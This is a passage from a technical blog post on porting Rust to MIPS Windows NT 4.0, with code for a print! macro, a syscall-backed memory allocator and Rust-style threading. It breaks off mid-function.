<span class="nf">Ok</span><span class="p">(</span><span class="n">iosb</span><span class="py">.information</span><span class="p">)</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nf">Err</span><span class="p">(</span><span class="n">status</span><span class="p">)</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<h3 id="rust-print-and-formatting">Rust <code class="language-plaintext highlighter-rouge">print!()</code> and formatting</h3>
<p>To use Rust in the best way possible, we want to have support for the
<code class="language-plaintext highlighter-rouge">print!()</code> macro; this is the <code class="language-plaintext highlighter-rouge">printf()</code> of the Rust world. It happens to be
really easy to add support for!</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">/// Writer structure that simply implements [`core::fmt::Write`] such that we</span>
<span class="c">/// can use `write_fmt` in our [`print!`]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">Writer</span><span class="p">;</span>
<span class="k">impl</span> <span class="nn">core</span><span class="p">::</span><span class="nn">fmt</span><span class="p">::</span><span class="n">Write</span> <span class="k">for</span> <span class="n">Writer</span> <span class="p">{</span>
<span class="k">fn</span> <span class="nf">write_str</span><span class="p">(</span><span class="o">&</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span> <span class="n">s</span><span class="p">:</span> <span class="o">&</span><span class="nb">str</span><span class="p">)</span> <span class="k">-></span> <span class="nn">core</span><span class="p">::</span><span class="nn">fmt</span><span class="p">::</span><span class="n">Result</span> <span class="p">{</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="nn">crate</span><span class="p">::</span><span class="nn">syscall</span><span class="p">::</span><span class="nf">write</span><span class="p">(</span><span class="k">unsafe</span> <span class="p">{</span> <span class="o">&</span><span class="n">SOCKET</span> <span class="p">},</span> <span class="n">s</span><span class="p">);</span>
<span class="nf">Ok</span><span class="p">(())</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c">/// Classic `print!()` macro</span>
<span class="nd">#[macro_export]</span>
<span class="nd">macro_rules!</span> <span class="n">print</span> <span class="p">{</span>
<span class="p">(</span><span class="nv">$</span><span class="p">(</span><span class="nv">$arg:tt</span><span class="p">)</span><span class="o">*</span><span class="p">)</span> <span class="k">=></span> <span class="p">{</span>
<span class="k">let</span> <span class="mi">_</span> <span class="o">=</span> <span class="nn">core</span><span class="p">::</span><span class="nn">fmt</span><span class="p">::</span><span class="nn">Write</span><span class="p">::</span><span class="nf">write_fmt</span><span class="p">(</span>
<span class="o">&</span><span class="k">mut</span> <span class="nv">$crate</span><span class="p">::</span><span class="nn">print</span><span class="p">::</span><span class="n">Writer</span><span class="p">,</span> <span class="nn">core</span><span class="p">::</span><span class="nd">format_args!</span><span class="p">(</span><span class="nv">$</span><span class="p">(</span><span class="nv">$arg</span><span class="p">)</span><span class="o">*</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Simply create a dummy structure, implement <code class="language-plaintext highlighter-rouge">core::fmt::Write</code> on it, and now
you can directly use <code class="language-plaintext highlighter-rouge">Write::write_fmt()</code> to write format strings. All you
have to do is implement a sink for <code class="language-plaintext highlighter-rouge">&str</code>s, which is really just a <code class="language-plaintext highlighter-rouge">char*</code> and
a length. In our case, we invoke the <code class="language-plaintext highlighter-rouge">NtWriteFile()</code> syscall with our socket
we saved from the client.</p>
<p>Voilà, we have remote output in a nice development environment:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pleb@gamey ~/mipstest $ felfserv 0.0.0.0:1234 ./out.felf
Serving 6732 bytes to 192.168.1.2:45914
---------------------------------
Hello world from Rust at 0x13370790
</code></pre></div></div>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="k">-></span> <span class="n">Result</span><span class="o"><</span><span class="p">(),</span> <span class="p">()</span><span class="o">></span> <span class="p">{</span>
<span class="nd">println!</span><span class="p">(</span><span class="s">"Hello world from Rust at {:#x}"</span><span class="p">,</span> <span class="n">main</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">);</span>
<span class="nf">Ok</span><span class="p">(())</span>
<span class="p">}</span>
</code></pre></div></div>
<p>It’s that easy!</p>
<h2 id="memory-allocation">Memory allocation</h2>
<p>Now that we have the basic ability to print things and use Rust, the next big
feature that we’re missing is the ability to dynamically allocate memory.
Luckily, we talked about the <code class="language-plaintext highlighter-rouge">alloc</code> feature of Rust before. Now, <code class="language-plaintext highlighter-rouge">alloc</code>
isn’t something you get for free. Rust doesn’t know how to allocate memory in
the environment you’re running it in, so you need to implement an allocator.</p>
<p>Luckily, once again, Rust is really friendly here. All you have to do is
implement the <code class="language-plaintext highlighter-rouge">GlobalAlloc</code> trait on a global structure. You implement an
<code class="language-plaintext highlighter-rouge">alloc()</code> function which takes in a <code class="language-plaintext highlighter-rouge">Layout</code> (size and alignment) and returns
a <code class="language-plaintext highlighter-rouge">*mut u8</code>, <code class="language-plaintext highlighter-rouge">NULL</code> on failure. Then you have a <code class="language-plaintext highlighter-rouge">dealloc()</code> where you get the
pointer that was used for the allocation, the <code class="language-plaintext highlighter-rouge">Layout</code> again (actually really
nice to know the size of the allocation at <code class="language-plaintext highlighter-rouge">free()</code> time) and that’s it.</p>
<p>Since we don’t care too much about the performance of our dynamic allocator,
we’ll just pass this information through directly to the NT kernel by doing
virtual memory maps and frees.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">alloc</span><span class="p">::</span><span class="nn">alloc</span><span class="p">::{</span><span class="n">Layout</span><span class="p">,</span> <span class="n">GlobalAlloc</span><span class="p">};</span>
<span class="c">/// Implementation of the global allocator</span>
<span class="k">struct</span> <span class="n">GlobalAllocator</span><span class="p">;</span>
<span class="c">/// Global allocator object</span>
<span class="nd">#[global_allocator]</span>
<span class="k">static</span> <span class="n">GLOBAL_ALLOCATOR</span><span class="p">:</span> <span class="n">GlobalAllocator</span> <span class="o">=</span> <span class="n">GlobalAllocator</span><span class="p">;</span>
<span class="k">unsafe</span> <span class="k">impl</span> <span class="n">GlobalAlloc</span> <span class="k">for</span> <span class="n">GlobalAllocator</span> <span class="p">{</span>
<span class="k">unsafe</span> <span class="k">fn</span> <span class="nf">alloc</span><span class="p">(</span><span class="o">&</span><span class="k">self</span><span class="p">,</span> <span class="n">layout</span><span class="p">:</span> <span class="n">Layout</span><span class="p">)</span> <span class="k">-></span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span> <span class="p">{</span>
<span class="nn">crate</span><span class="p">::</span><span class="nn">syscall</span><span class="p">::</span><span class="nf">mmap</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">layout</span><span class="nf">.size</span><span class="p">())</span><span class="nf">.unwrap_or</span><span class="p">(</span><span class="nn">core</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">null_mut</span><span class="p">())</span>
<span class="p">}</span>
<span class="k">unsafe</span> <span class="k">fn</span> <span class="nf">dealloc</span><span class="p">(</span><span class="o">&</span><span class="k">self</span><span class="p">,</span> <span class="n">addr</span><span class="p">:</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">,</span> <span class="mi">_</span><span class="n">layout</span><span class="p">:</span> <span class="n">Layout</span><span class="p">)</span> <span class="p">{</span>
<span class="nn">crate</span><span class="p">::</span><span class="nn">syscall</span><span class="p">::</span><span class="nf">munmap</span><span class="p">(</span><span class="n">addr</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">)</span>
<span class="nf">.expect</span><span class="p">(</span><span class="s">"Failed to deallocate memory"</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>As for the syscalls, they’re honestly not too bad either, so I won’t go into
much more detail. You’ll notice these are similar to <code class="language-plaintext highlighter-rouge">VirtualAlloc()</code>, a
common API in Windows development.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">/// Allocate virtual memory in the current process</span>
<span class="k">pub</span> <span class="k">fn</span> <span class="nf">mmap</span><span class="p">(</span><span class="k">mut</span> <span class="n">addr</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span> <span class="k">mut</span> <span class="n">size</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">-></span> <span class="n">Result</span><span class="o"><*</span><span class="k">mut</span> <span class="nb">u8</span><span class="o">></span> <span class="p">{</span>
<span class="c">/// Commit memory</span>
<span class="k">const</span> <span class="n">MEM_COMMIT</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="mi">0x1000</span><span class="p">;</span>
<span class="c">/// Reserve memory range</span>
<span class="k">const</span> <span class="n">MEM_RESERVE</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="mi">0x2000</span><span class="p">;</span>
<span class="c">/// Readable and writable memory</span>
<span class="k">const</span> <span class="n">PAGE_READWRITE</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="mi">0x4</span><span class="p">;</span>
<span class="c">// Perform syscall</span>
<span class="k">let</span> <span class="n">status</span> <span class="o">=</span> <span class="nf">NtStatus</span><span class="p">(</span><span class="k">unsafe</span> <span class="p">{</span>
<span class="nf">syscall6</span><span class="p">(</span>
<span class="c">// [in] HANDLE ProcessHandle,</span>
<span class="o">!</span><span class="mi">0</span><span class="p">,</span>
<span class="c">// [in, out] PVOID *BaseAddress,</span>
<span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// [in] ULONG_PTR ZeroBits,</span>
<span class="mi">0</span><span class="p">,</span>
<span class="c">// [in, out] PSIZE_T RegionSize,</span>
<span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">size</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// [in] ULONG AllocationType,</span>
<span class="p">(</span><span class="n">MEM_COMMIT</span> <span class="p">|</span> <span class="n">MEM_RESERVE</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// [in] ULONG Protect</span>
<span class="n">PAGE_READWRITE</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// Syscall ID</span>
<span class="nn">Syscall</span><span class="p">::</span><span class="n">AllocateVirtualMemory</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="p">)</span>
<span class="p">}</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">);</span>
<span class="c">// If success, return allocation otherwise return status</span>
<span class="k">if</span> <span class="n">status</span><span class="nf">.success</span><span class="p">()</span> <span class="p">{</span>
<span class="nf">Ok</span><span class="p">(</span><span class="n">addr</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">)</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nf">Err</span><span class="p">(</span><span class="n">status</span><span class="p">)</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c">/// Release memory range</span>
<span class="k">const</span> <span class="n">MEM_RELEASE</span><span class="p">:</span> <span class="nb">u32</span> <span class="o">=</span> <span class="mi">0x8000</span><span class="p">;</span>
<span class="c">/// De-allocate virtual memory in the current process</span>
<span class="k">pub</span> <span class="k">unsafe</span> <span class="k">fn</span> <span class="nf">munmap</span><span class="p">(</span><span class="k">mut</span> <span class="n">addr</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">-></span> <span class="n">Result</span><span class="o"><</span><span class="p">()</span><span class="o">></span> <span class="p">{</span>
<span class="c">// Region size</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">size</span> <span class="o">=</span> <span class="mi">0u</span><span class="n">size</span><span class="p">;</span>
<span class="c">// Perform syscall</span>
<span class="k">let</span> <span class="n">status</span> <span class="o">=</span> <span class="nf">NtStatus</span><span class="p">(</span><span class="nf">syscall4</span><span class="p">(</span>
<span class="c">// [in] HANDLE ProcessHandle,</span>
<span class="o">!</span><span class="mi">0</span><span class="p">,</span>
<span class="c">// [in, out] PVOID *BaseAddress,</span>
<span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">addr</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// [in, out] PSIZE_T RegionSize,</span>
<span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">size</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// [in] ULONG AllocationType,</span>
<span class="n">MEM_RELEASE</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="c">// Syscall ID</span>
<span class="nn">Syscall</span><span class="p">::</span><span class="n">FreeVirtualMemory</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="p">)</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">);</span>
<span class="c">// Return error on error</span>
<span class="k">if</span> <span class="n">status</span><span class="nf">.success</span><span class="p">()</span> <span class="p">{</span>
<span class="nf">Ok</span><span class="p">(())</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nf">Err</span><span class="p">(</span><span class="n">status</span><span class="p">)</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>And voilà. Now we can use <code class="language-plaintext highlighter-rouge">String</code>s, <code class="language-plaintext highlighter-rouge">Box</code>es, <code class="language-plaintext highlighter-rouge">Vec</code>s, <code class="language-plaintext highlighter-rouge">BTreeMap</code>s, and a whole
list of other standard data structures in Rust. At this point, other than
file I/O, networking, and threading, this environment is probably capable of
running pretty much any generic Rust code, just by implementing two simple
allocation functions. How cool is that!?</p>
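<p>As a quick taste of what those two functions unlock, all of the following now
works in the freestanding environment through the <code class="language-plaintext highlighter-rouge">alloc</code> crate. The sketch
below uses <code class="language-plaintext highlighter-rouge">std</code> paths so it runs anywhere; in the actual <code class="language-plaintext highlighter-rouge">no_std</code> build these
same types come from <code class="language-plaintext highlighter-rouge">alloc</code> instead.</p>

```rust
use std::collections::BTreeMap;

fn main() {
    // Growable vector: each regrowth goes through the global allocator,
    // which in our environment bottoms out in NtAllocateVirtualMemory()
    let mut v = Vec::new();
    for i in 0..10 {
        v.push(i * i);
    }
    assert_eq!(v[9], 81);

    // Heap-allocated, formatted string
    let s = format!("sum = {}", v.iter().sum::<i32>());
    assert_eq!(s, "sum = 285");

    // Ordered map, also backed by the same two allocation functions
    let mut m = BTreeMap::new();
    m.insert("nt", 4.0f32);
    assert!(m.contains_key("nt"));

    println!("{}", s);
}
```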
<h2 id="threading">Threading</h2>
<p>Some terrible person in my chat just had to ask “what about threading support”.
Of course, this could be an offhand comment that I dismiss or laugh at, but
yeah, what about threading? After all, we want to write a fuzzer, and without
threads how will we ever hit those juicy race conditions, totally necessary on
1996 software?!</p>
<p>Well, this threw us for a huge loop. First of all, how do we actually create
threads in Windows, and next, how do we do it in a Rust-style way, using
closures that can be <code class="language-plaintext highlighter-rouge">join()</code>ed to get the return result?</p>
<h3 id="creating-threads-on-windows">Creating threads on Windows</h3>
<p>Unfortunately, creating threads on Windows requires the <code class="language-plaintext highlighter-rouge">NtCreateThread()</code>
syscall. This is not documented, and honestly took a pretty long time to figure
out. You don’t actually give it a function pointer to execute and a parameter
like most thread creation libraries at a higher level.</p>
<p>Instead, you actually give it an entire <code class="language-plaintext highlighter-rouge">CONTEXT</code>. In Windows development, the
<code class="language-plaintext highlighter-rouge">CONTEXT</code> structure is a very-specific-to-your-architecture structure that
contains all of the CPU register state. So, you actually have to figure out
the correct <code class="language-plaintext highlighter-rouge">CONTEXT</code> shape for your architecture (usually there are multiple,
controlled by heavy <code class="language-plaintext highlighter-rouge">#ifdef</code>s). This might have taken us an hour to actually
figure out, I don’t remember.</p>
<p>On top of this, you also provide it the stack register. Yep, you heard that
right, you have to create the stack for the thread. This is yet another step
that I wasn’t really expecting that added to the complexity.</p>
<p>Anyways, at the end of the day, you launch a new thread in your process, you
give it a CPU context (and by nature a stack and target entry address), and
let it run off and do its thing.</p>
<p>However, this isn’t very Rust-like. Rust allows you to optionally <code class="language-plaintext highlighter-rouge">join()</code> on a
thread to get the return result from it; further, threads are started as
closures, so you can pass arbitrary parameters to the thread with super
convenient syntax, either by <code class="language-plaintext highlighter-rouge">move</code> or by reference.</p>
<h4 id="threading-in-rust">Threading in Rust</h4>
<p>This leads to a hard-ish problem. How do we get Rust-style threads? Until we
wrote this, I never really even thought about it. Initially we thought about
some fancy static ways of doing it, but ultimately, due to using closures, you
<em>must</em> put information on the heap. It’s obvious in hindsight: if you want
to move ownership of some of your stack locals into this thread, how are you
possibly going to do that without storing it somewhere? You can’t let the
thread use the parent’s stack; that wouldn’t work too well.</p>
<p>So, we implemented a <code class="language-plaintext highlighter-rouge">spawn</code> routine that would take in a closure (with the
same constraints of Rust’s own <code class="language-plaintext highlighter-rouge">std::thread::spawn</code>), put the closure into a
<code class="language-plaintext highlighter-rouge">Box</code>, turning it into a dynamically dispatched trait (vftables and friends),
while moving all of the variables captured by the closure into the heap.</p>
<p>We then can invoke <code class="language-plaintext highlighter-rouge">NtCreateThread()</code> with a stack that we created, point the
thread at a simple trampoline and pass in a pointer to the raw backing of the
<code class="language-plaintext highlighter-rouge">Box</code>. Then, in the trampoline, we can convert the raw pointer back into a
<code class="language-plaintext highlighter-rouge">Box</code> and invoke it! Now we’ve run the closure in the thread!</p>
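<p>A host-runnable sketch of that Box-and-trampoline trick is below. The
<code class="language-plaintext highlighter-rouge">NtCreateThread()</code> plumbing is elided; here we simply call the trampoline
directly, standing in for the new thread starting at it with the raw pointer
in its argument register.</p>

```rust
/// The shape of a spawnable closure: a boxed, dynamically dispatched
/// trait object (fat pointer: data + vftable)
type ThreadClosure = Box<dyn FnOnce() + Send + 'static>;

/// Trampoline the new thread starts at: reconstitute the Box and call it.
/// Takes a *thin* pointer, which is why the closure is double-boxed.
extern "C" fn trampoline(closure_ptr: *mut ThreadClosure) {
    // Safety: pointer came from Box::into_raw() in spawn(), used once
    let closure: Box<ThreadClosure> = unsafe { Box::from_raw(closure_ptr) };
    closure();
}

fn spawn<F: FnOnce() + Send + 'static>(f: F) {
    // Double-box: the outer Box gives us a thin pointer to the fat
    // trait object, and moves all captured variables onto the heap
    let boxed: Box<ThreadClosure> = Box::new(Box::new(f));
    let raw = Box::into_raw(boxed);
    // Real code: point the CONTEXT's program counter at `trampoline`,
    // put `raw` in the argument register, then NtCreateThread().
    // Demo: pretend we're the new thread.
    trampoline(raw);
}

fn main() {
    let local = 5;
    spawn(move || println!("hello from 'thread', captured {}", local));
}
```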
<h4 id="return-values">Return values</h4>
<p>Unfortunately, this only gets us execution of the closure. We still have to
add the ability to get return values from the thread. This has a unique design
problem that the return value has to be accessible to the thread which created
it, while also being accessible to the thread itself to initialize. Further,
since the creator can simply ignore the result, the thread can’t free the
return storage on its own, as it has no way of knowing whether the creator
still wants it (short of explicitly communicating that).</p>
<p>So, we ended up using an <code class="language-plaintext highlighter-rouge">Arc<></code>. This is an atomically reference-counted,
heap-allocated structure in Rust, and it ensures that the value lives as long as
there is one reference. This works perfectly for this situation, we give one
copy of the <code class="language-plaintext highlighter-rouge">Arc</code> to the thread (ref count 1), and then another copy to the
creator of the thread (ref count 2). This way, the only way the storage for
the <code class="language-plaintext highlighter-rouge">Arc</code> is freed is if both the thread and creator are done with it.</p>
<p>Further, we need to ensure some level of synchronization with the thread as
the creator cannot check this return value of the thread until the thread
has initialized it. Luckily, we can accomplish this in two ways. One, when
a user <code class="language-plaintext highlighter-rouge">join()</code>s on a thread, it blocks until that thread finishes execution.
To do this we invoke <code class="language-plaintext highlighter-rouge">NtWaitForSingleObject()</code> that takes in a <code class="language-plaintext highlighter-rouge">HANDLE</code>, given
to us when we created the thread, and a timeout. By setting an infinite timeout
we can ensure that we do not do anything until the thread is done.</p>
<p>This leaves some implementation-specific details about threads up in the air,
like what happens with thread early termination, crashes, etc. Thus, we want
to also ensure the return value has been updated in another way.</p>
<p>We did this by being creative with the <code class="language-plaintext highlighter-rouge">Arc</code> reference count. The <code class="language-plaintext highlighter-rouge">Arc</code>
reference count can only be decreased by the thread when the <code class="language-plaintext highlighter-rouge">Arc</code> goes out
of scope, and due to the way we designed the thread, this can only happen once
the value has been successfully initialized.</p>
<p>Thus, in our main thread, we can call <code class="language-plaintext highlighter-rouge">Arc::try_unwrap()</code> on our return value,
this will only succeed if we are the only reference to the <code class="language-plaintext highlighter-rouge">Arc</code>, thus
atomically ensuring that the thread has successfully updated the return value!</p>
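<p>The refcount handshake can be demonstrated with plain <code class="language-plaintext highlighter-rouge">std::sync::Arc</code>. This
is a single-threaded stand-in for the demo: the <code class="language-plaintext highlighter-rouge">Cell</code> plays the role of the
shared return slot, and dropping <code class="language-plaintext highlighter-rouge">thread_ref</code> plays the role of the thread’s
<code class="language-plaintext highlighter-rouge">Arc</code> going out of scope after initialization.</p>

```rust
use std::cell::Cell;
use std::sync::Arc;

fn main() {
    // Creator makes the storage and clones one reference for the "thread"
    let slot: Arc<Cell<Option<i32>>> = Arc::new(Cell::new(None));
    let thread_ref = Arc::clone(&slot);

    // While the thread still holds its clone, try_unwrap fails, so the
    // creator can never observe a half-initialized return value
    let slot = match Arc::try_unwrap(slot) {
        Ok(_) => unreachable!("thread still holds a reference"),
        Err(still_shared) => still_shared,
    };

    // "Thread" initializes the value, then its reference goes away
    thread_ref.set(Some(22));
    drop(thread_ref);

    // Now the creator is the sole owner, so try_unwrap succeeds
    let ret = Arc::try_unwrap(slot).expect("thread is done").into_inner();
    assert_eq!(ret, Some(22));
    println!("Return val: {:?}", ret);
}
```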
<p>Now we have full Rust-style threading, à la:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">fn</span> <span class="nf">main</span><span class="p">()</span> <span class="k">-></span> <span class="n">Result</span><span class="o"><</span><span class="p">(),</span> <span class="p">()</span><span class="o">></span> <span class="p">{</span>
<span class="k">let</span> <span class="n">a_local_value</span> <span class="o">=</span> <span class="mi">5</span><span class="p">;</span>
<span class="k">let</span> <span class="n">thr</span> <span class="o">=</span> <span class="nn">syscall</span><span class="p">::</span><span class="nf">spawn</span><span class="p">(</span><span class="k">move</span> <span class="p">||</span> <span class="p">{</span>
<span class="nd">println!</span><span class="p">(</span><span class="s">"Hello world from Rust thread {}"</span><span class="p">,</span> <span class="n">a_local_value</span><span class="p">);</span>
<span class="nn">core</span><span class="p">::</span><span class="nn">cell</span><span class="p">::</span><span class="nn">RefCell</span><span class="p">::</span><span class="nf">new</span><span class="p">(</span><span class="mi">22</span><span class="p">)</span>
<span class="p">})</span><span class="nf">.unwrap</span><span class="p">();</span>
<span class="nd">println!</span><span class="p">(</span><span class="s">"Return val: {:?}"</span><span class="p">,</span> <span class="n">thr</span><span class="nf">.join</span><span class="p">()</span><span class="nf">.unwrap</span><span class="p">());</span>
<span class="nf">Ok</span><span class="p">(())</span>
<span class="p">}</span>
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Serving 23500 bytes to 192.168.1.2:46026
---------------------------------
Hello world from Rust thread 5
Return val: RefCell { value: 22 }
</code></pre></div></div>
<p>HOW COOL IS THAT!? RIGHT!? This is on MIPS for Windows NT 4.0, an operating
system from almost 20 years prior to Rust even existing! We have all the safety
and fun features of bounds checking, dynamically growing vectors, scope-based
dropping of references, locks, and allocations, etc.</p>
<h4 id="cleaning-it-all-up">Cleaning it all up</h4>
<p>Unfortunately, we have a few leaks. We leak the handle that we got when
we created the thread, and we also leak the stack of the thread itself. This
is actually a tough-ish problem. How do we free the stack of a thread when we
don’t know when it exits (as the creator of the thread might never <code class="language-plaintext highlighter-rouge">join()</code>
it)?</p>
<p>Well, the first problem is easy. Implement a <code class="language-plaintext highlighter-rouge">Handle</code> type, implement a <code class="language-plaintext highlighter-rouge">Drop</code>
handler on it, and Rust will automatically clean up the handle when it goes
out of scope by calling the <code class="language-plaintext highlighter-rouge">NtClose()</code> in our <code class="language-plaintext highlighter-rouge">Drop</code> handler. Phew, that’s
easy.</p>
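<p>A minimal sketch of that <code class="language-plaintext highlighter-rouge">Drop</code> pattern is below. The <code class="language-plaintext highlighter-rouge">nt_close()</code> stub and
its counter are assumptions for the demo, standing in for the real
<code class="language-plaintext highlighter-rouge">NtClose()</code> syscall wrapper.</p>

```rust
use std::sync::atomic::{AtomicU32, Ordering};

/// Count of "closed" handles, so we can observe the Drop firing
static CLOSED: AtomicU32 = AtomicU32::new(0);

/// Stand-in for the NtClose() syscall wrapper
fn nt_close(_raw: usize) {
    CLOSED.fetch_add(1, Ordering::SeqCst);
}

/// Owned kernel handle; closing happens automatically on scope exit
struct Handle(usize);

impl Drop for Handle {
    fn drop(&mut self) {
        // Real code: invoke the NtClose() syscall on self.0
        nt_close(self.0);
    }
}

fn main() {
    {
        let _thread_handle = Handle(0x1234);
        // ... wait on the thread, read results, etc ...
    } // <- handle goes out of scope, NtClose() runs right here
    assert_eq!(CLOSED.load(Ordering::SeqCst), 1);
    println!("handle closed exactly once");
}
```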
<p>Freeing the stack is a bit harder, but we decided that the best route would
be to have the thread free its own stack. This isn’t too hard; it just means
that we must free the stack and exit the thread without touching the stack,
ideally without using any globals as that would have race conditions.</p>
<p>Luckily, we can do this just fine if we implement the syscalls we need directly
in one assembly block where we know we have full control.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// Region size</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">rsize</span> <span class="o">=</span> <span class="mi">0u</span><span class="n">size</span><span class="p">;</span>
<span class="c">// Free the stack and then exit the thread. We do this in one assembly</span>
<span class="c">// block to ensure we don't touch any stack memory during this stage</span>
<span class="c">// as we are freeing the stack.</span>
<span class="k">unsafe</span> <span class="p">{</span>
<span class="nd">asm!</span><span class="p">(</span><span class="s">r#"
// Set the link register
jal 2f
// Exit thread
jal 3f
break
2:
// NtFreeVirtualMemory()
li $v0, {free}
syscall
3:
// NtTerminateThread()
li $v0, {terminate}
li $a0, -2 // GetCurrentThread()
li $a1, 0 // exit code
syscall
"#</span><span class="p">,</span> <span class="n">terminate</span> <span class="o">=</span> <span class="k">const</span> <span class="nn">Syscall</span><span class="p">::</span><span class="n">TerminateThread</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="n">free</span> <span class="o">=</span> <span class="k">const</span> <span class="nn">Syscall</span><span class="p">::</span><span class="n">FreeVirtualMemory</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
<span class="nf">in</span><span class="p">(</span><span class="s">"$4"</span><span class="p">)</span> <span class="o">!</span><span class="mi">0u</span><span class="n">size</span><span class="p">,</span>
<span class="nf">in</span><span class="p">(</span><span class="s">"$5"</span><span class="p">)</span> <span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">stack</span><span class="p">),</span>
<span class="nf">in</span><span class="p">(</span><span class="s">"$6"</span><span class="p">)</span> <span class="nd">addr_of_mut!</span><span class="p">(</span><span class="n">rsize</span><span class="p">),</span>
<span class="nf">in</span><span class="p">(</span><span class="s">"$7"</span><span class="p">)</span> <span class="n">MEM_RELEASE</span><span class="p">,</span> <span class="nf">options</span><span class="p">(</span><span class="n">noreturn</span><span class="p">));</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Interestingly, we do technically have to pass a stack variable to
<code class="language-plaintext highlighter-rouge">NtFreeVirtualMemory()</code>, but that’s actually okay: either the kernel updates
that variable before freeing the stack, in which case it’s fine, or it updates
the variable as an untrusted user pointer after the stack is freed and returns
with an error. We don’t really care either way, as the stack gets freed
regardless. Then, all we have to do is call <code class="language-plaintext highlighter-rouge">NtTerminateThread()</code> and we’re all done.</p>
<p>Huzzah, fancy Rust threading, no memory leaks, (hopefully) no race conditions.</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">/// Spawn a thread</span>
<span class="c">///</span>
<span class="c">/// MIPS specific due to some inline assembly as well as MIPS-specific context</span>
<span class="c">/// structure creation.</span>
<span class="k">pub</span> <span class="k">fn</span> <span class="n">spawn</span><span class="o"><</span><span class="n">F</span><span class="p">,</span> <span class="n">T</span><span class="o">></span><span class="p">(</span><span class="n">f</span><span class="p">:</span> <span class="n">F</span><span class="p">)</span> <span class="k">-></span> <span class="n">Result</span><span class="o"><</span><span class="n">JoinHandle</span><span class="o"><</span><span class="n">T</span><span class="o">>></span>
<span class="k">where</span> <span class="n">F</span><span class="p">:</span> <span class="nf">FnOnce</span><span class="p">()</span> <span class="k">-></span> <span class="n">T</span><span class="p">,</span>
<span class="n">F</span><span class="p">:</span> <span class="nb">Send</span> <span class="o">+</span> <span class="nv">'static</span><span class="p">,</span>
<span class="n">T</span><span class="p">:</span> <span class="nb">Send</span> <span class="o">+</span> <span class="nv">'static</span> <span class="p">{</span>
<span class="c">// Holder for returned client handle</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">handle</span> <span class="o">=</span> <span class="mi">0u</span><span class="n">size</span><span class="p">;</span>
<span class="c">// Placeholder for returned client ID</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">client_id</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0u</span><span class="n">size</span><span class="p">;</span> <span class="mi">2</span><span class="p">];</span>
<span class="c">// Create a new context</span>
